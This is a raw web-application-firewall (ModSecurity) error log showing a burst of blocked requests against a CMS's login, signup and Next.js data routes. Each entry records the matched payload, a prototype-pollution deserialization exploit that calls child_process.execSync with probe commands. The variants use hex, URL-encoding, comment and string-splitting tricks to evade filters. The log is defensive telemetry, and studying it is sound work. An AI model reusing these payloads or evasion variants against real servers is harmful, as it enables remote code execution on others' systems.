{\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy0I7AjfUQYCN-J7DjwAAAMk"] [Sun Apr 05 15:42:35.749272 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:42202] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy7xQSOrq_iRTM7dplQAAAQY"] [Sun Apr 05 15:42:35.750139 2026] [:error] [pid 31198:tid 31261] [client 172.94.9.253:42164] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmyzT5TgrBR8xRnfXA7wAAAUk"] [Sun Apr 05 15:42:35.751014 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:42146] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy7xQSOrq_iRTM7dplgAAAQI"] [Sun Apr 05 15:42:35.751492 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:42160] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy7xQSOrq_iRTM7dplwAAAQs"] [Sun Apr 05 15:42:35.751705 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:42140] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy5c83uMXRUE9zvQS0wAAAcM"] [Sun Apr 05 15:42:35.764483 2026] [:error] [pid 1309:tid 1384] [client 172.94.9.253:42126] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmyz-XKUNJEHmNu6G7uwAAAI0"] [Sun Apr 05 15:42:35.765517 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:42166] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy5c83uMXRUE9zvQS1AAAAcE"] [Sun Apr 05 15:42:35.848203 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:42228] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy5c83uMXRUE9zvQS1QAAAcU"] [Sun Apr 05 15:42:35.855337 2026] [:error] [pid 23077:tid 23090] [client 172.94.9.253:42288] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy5c83uMXRUE9zvQS1gAAAcc"] [Sun Apr 05 15:42:35.855635 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:42230] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy7xQSOrq_iRTM7dpmQAAARI"] [Sun Apr 05 15:42:35.855688 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:42260] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy7xQSOrq_iRTM7dpmAAAAQ4"] [Sun Apr 05 15:42:35.855933 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:42242] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy7xQSOrq_iRTM7dpmgAAAQ0"] [Sun Apr 05 15:42:35.856095 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:42252] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy5c83uMXRUE9zvQS1wAAAco"] [Sun Apr 05 15:42:35.856107 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:42280] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy5c83uMXRUE9zvQS2AAAAcY"] [Sun Apr 05 15:42:35.858228 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:42246] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy7xQSOrq_iRTM7dpmwAAAQQ"] [Sun Apr 05 15:42:35.858592 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:42270] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/login"] [unique_id "adJmy7xQSOrq_iRTM7dpnAAAAQU"] [Sun Apr 05 15:42:35.861836 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:42254] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy5c83uMXRUE9zvQS2QAAAcs"] [Sun Apr 05 15:42:35.959834 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:42310] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmy7xQSOrq_iRTM7dpnQAAAQ4"] [Sun Apr 05 15:42:35.959848 2026] [:error] [pid 1306:tid 1322] [client 172.94.9.253:42306] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmy4RhslBlnapNAUOXlAAAAAU"] [Sun Apr 05 15:42:35.959871 2026] [:error] [pid 23077:tid 23091] [client 172.94.9.253:42368] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 